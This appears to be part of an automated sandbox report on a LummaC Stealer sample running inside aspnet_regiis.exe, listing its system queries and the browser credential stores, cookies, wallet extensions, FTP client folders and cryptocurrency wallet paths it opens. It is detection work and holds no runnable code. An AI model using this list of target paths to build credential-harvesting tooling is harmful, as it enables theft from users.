Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Code function: 24_2_68C01253 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

24_2_68C01253

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe	String found in binary or memory: llets/Electrum-LTC
Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe	String found in binary or memory: Wallets/Exodus
Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: aspnet_regiis.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000008.00000002.1749981425.0000000006216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
